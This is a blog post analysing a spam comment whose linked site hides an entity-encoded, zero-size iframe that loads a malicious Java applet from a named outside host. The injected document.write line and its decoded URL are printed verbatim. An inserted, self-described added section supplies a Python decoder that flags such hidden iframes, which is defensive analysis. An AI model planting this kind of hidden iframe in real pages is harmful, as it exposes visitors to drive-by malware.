Anatomy of a spam comment

by Volker Weber

[Image: anatomy of a spam comment]

[CAUTION: Do NOT load any of the URLs mentioned below]

Today I received yet another spam comment that tried to plant a link to a site which calls itself "A WebSite for creative intellectuals" and pretends to teach you how to use The Gimp. This has happened before: twice on 29.09.2004 from IP address 141.30.207.43, which belongs to the data center of the Technical University Dresden, and again from the same address on 5.6.2006. On 10.11.2006 the spammer moved to 131.188.3.20, which belongs to the Friedrich Alexander University Erlangen-Nuernberg. The site the spammer links to belongs to a person with an address in Dresden.

If you examine the source code of the site, you will find that it loads /data.htm, which in turn loads /ad/s-block.js, which contains an interesting line:

document.write('<iframe src="&#104&#116&#116&#112&#58&#47&#47&#120&#45&#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99&#104&#47&#111&#117&#116&#46&#112&#104&#112" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');

The entity-encoded src decodes to http://x-road.co.kr/rich/out.php, and with width=1 and height=0 the iframe is invisible to the visitor. That PHP script evaluates the referrer and either redirects you to Yahoo.com or loads a malicious Java applet. Here is what Google has to say about this address:
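To show how an analyst would pull the hidden iframe out of such a script without ever loading the page, here is an added example (my own code, not part of the original post): it decodes the semicolon-less numeric character references and lists every iframe written by document.write(), flagging those that are effectively invisible. The sample input is the line quoted above, re-typed here as a constant; the record keys (src, width, height, hidden) are my own choice.

```python
import re

# Constructed sample input: the document.write() line quoted above, re-typed
# here so the script runs offline. Do not fetch the URL it decodes to.
SAMPLE_JS = (
    "document.write('<iframe src=\"&#104&#116&#116&#112&#58&#47&#47&#120&#45"
    "&#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99"
    "&#104&#47&#111&#117&#116&#46&#112&#104&#112\" width=1 frameborder=0 "
    "vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no "
    "width=0 height=0></iframe>');"
)

# Numeric character references, decimal or hex. The ';' is optional because
# browsers accept its absence, which is exactly what this obfuscation relies on.
ENTITY_RE = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);?")
DOCWRITE_RE = re.compile(r"document\.write(?:ln)?\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"([A-Za-z-]+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")


def decode_numeric_entities(s):
    """Decode &#NNN / &#xHH references to text.

    Whitespace that a line wrap inserted between two references (as in a
    pasted copy of the script) is dropped first, since a browser reading the
    real file would never see it.
    """
    s = re.sub(r"(&#(?:x[0-9a-fA-F]+|[0-9]+);?)\s+(?=&#)", r"\1", s)

    def repl(m):
        ref = m.group(1)
        cp = int(ref[1:], 16) if ref[0] == "x" else int(ref)
        return chr(cp)

    return ENTITY_RE.sub(repl, s)


def parse_attrs(attr_text):
    """Attribute map for one tag. On duplicate attributes the FIRST value
    wins, as in an HTML parser, so 'width=1 ... width=0' yields width=1."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs.setdefault(m.group(1).lower(), m.group(2).strip("\"'"))
    return attrs


def _tiny(value):
    """True for a 0 or 1 pixel dimension, i.e. nothing a visitor would notice."""
    try:
        return int(value) <= 1
    except (TypeError, ValueError):
        return False


def find_hidden_iframes(js):
    """Return one record per <iframe> written via document.write() in js,
    with the decoded src and whether it is effectively invisible (width or
    height of 0/1 px). Only plain string literals are handled; string
    concatenation or escaped quotes inside the literal are not."""
    found = []
    for m in DOCWRITE_RE.finditer(js):
        html = decode_numeric_entities(m.group(2))
        for im in IFRAME_RE.finditer(html):
            a = parse_attrs(im.group(1))
            found.append({
                "src": a.get("src"),
                "width": a.get("width"),
                "height": a.get("height"),
                "hidden": _tiny(a.get("width")) or _tiny(a.get("height")),
            })
    return found


if __name__ == "__main__":
    for rec in find_hidden_iframes(SAMPLE_JS):
        print(rec)
```

Run it on a saved copy of the script, not on the live site. Note that because out.php keys on the Referer header, a fetch from an analysis box without the expected referrer may only ever show the redirect to Yahoo.com, which is why static decoding like this is the safer first step.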

[Screenshot of the Google result: "This site may harm your computer."]

And if you ask Google who links to this trap, you will find sites like sixtus.net, Schockwellenreiter, Mein Parteibuch, etc.

Comments

very interesting! thank you.

Samuel Adam, 2007-04-20 08:22

Perhaps someone should bring this to Google AdSense's attention, because either this is a large AdSense customer (recognizable by the missing Google logo on the ad displayed at the bottom), or the guys have modified the AdSense script, which is not permitted. As far as I know, "google_hints", for example, is still in the test phase and only available to selected customers.

Incidentally, for me "/data.htm" does not call "/ad/s-block.js" but "/ad/h-block.js".

It loads both.

© 1992-2008 Volker Weber.
All Rights Reserved.